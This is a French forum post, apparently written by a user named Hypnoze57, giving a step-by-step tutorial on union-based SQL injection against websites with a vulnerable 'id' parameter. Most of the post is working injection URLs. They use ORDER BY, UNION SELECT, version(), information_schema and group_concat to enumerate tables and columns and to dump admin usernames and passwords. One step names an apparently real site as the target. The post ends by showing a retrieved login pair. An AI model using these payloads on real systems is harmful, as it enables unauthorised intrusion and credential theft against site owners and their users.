Derniers messages de : Hypnoze57

**************************
* TUTO SQLi Basic By Hypnoze57 *
**************************

Bonjour, j'ai décidé de faire mon propre tutoriel sur l'injection sqli basic.

Etape 1 : Trouvé un site !

Le site :

Code:

http://www.......com/......php?id=1030

Pour savoir, ajouté un ' après le chiffre/nombres de l'id

Code:

http://www.......com/......php?id=1030'

--> ERREUR (FAILLE)

Etape 2 : Trouvé les columns !

Enlever le ' et ajouté

Code:

order by 20--

(20 est un exemple) si il y a une erreur, le column est plus petit, si la page charge normalement, vous devez trouvé le dernier chiffres qui charge la page normalement, j'explique mal je sais mais rien de mieux qu'un exemple :

Code:

http://www.......com/......php?id=1030 order by 14--

--> ERREUR !

Code:

http://www.......com/......php?id=1030 order by 13--

--> PAS D'ERREUR ! (Le bon collumn)

MAIS

Code:

http://www.......com/......php?id=1030 order by 10--

--PAS D'ERREUR MAIS PAS LE BON CAR LES AUTRES PLUS HAUT (11,12,13) charger aussi la page !

Etape 3 : Tout selectionné !

Code:

http://www.marmoon.com/pregames.php?id=-1030 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13--

N'oublié pas de rajouté le - après le .php?id=

Etape 4 : La version de la bdd !

Vous avez surement remarquer que lorsque vous séléctionné tout les columns un chiffre apparait sur la page (4 chez nous)?Pour trouvé la version de la base de donnée, vous devez remplacer ce fameux chiffre par

Code:

version()

Code:

http://www.......com/......php?id=-1030 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13--

Whouou ! La version et 5.*** ont peux continué ! Si la version est inférieur a 5, suivé un autre tutoriel

Etape 5 : Trouvé les tables !

Les tables vont logger les users, password ou autres infos !

Pour les trouvés, remplacer

Code:

version()

par

Code:

group_concat(table_name)

& ajouté entre les deux -- et le dernier column ceci :

Code:

+from+information_schema.tables where table_schema=database()

Ce qui va nous donné :

Code:

http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13+from+information_schema.tables where table_schema=database()--

Et la les tables s'affiche comme par miracle ! Celle qui nous intéresse est bien sûre admin !

Etape 6 : Exploité les tables !

Exploité les tables va nous servir a avoir les columns et dans les columns, il y aura les informations recherché !

Pour ceci, je vous invite a vous rendre ici : http://getyourwebsitehere.com/jswb/text_to_ascii.html

Ce site va convertir votre texte en ASCII.

Convertissé votre table, ex :

Code:

admin = admin = 97,100,109,105,110

Mais comment l'utilisé ! Tres simple :

remplacé

Code:

group_concat(table_name)

par

Code:

group_concat(column_name)

Code:

information_schema.tables

par

Code:

information_schema.columns

Et enfin

Code:

where table_schema=database()--

Par

Code:

where table_name=char(97,100,109,105,110)

(remplacé 97,100,109,105,110 par votre table en ASCII)

Ce qui nous donne :

Code:

http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13+from+information_schema.columns where table_name=char(97,100,109,105,110)

Etape 7 : Exploité les columns !

Pour exploité les columns que nous avons trouvé (id,admin,pass) chez nous, tres simple, c'est la dessus que s'acheve mon tutoriel

Remplacé

Code:

group_concat(column_name)

PAR

Code:

group_concat(admin,0x3a,pass)

(0x3a est la valeur ASCII pour séparer admin de pass et si vous voulé exploité id au lieu de admin, remplacé admin (ou pass)par id)

ET

Code:

+from+information_schema.columns where table_name=char(97,100,109,105,110)

PAR

Code:

+from+admin

Ce qui va nous donné :

Code:

http://www.......com/......php?id=-1030 union all select 1,2,3,group_concat(admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin

Et la miracle ! On as les pass et les users !

admin:asdfgh

L'user = admin
Le pass = asdfgh

(c) Hypnoze57 Tutoriel ! MERCI DE NE PAS LE COPIER !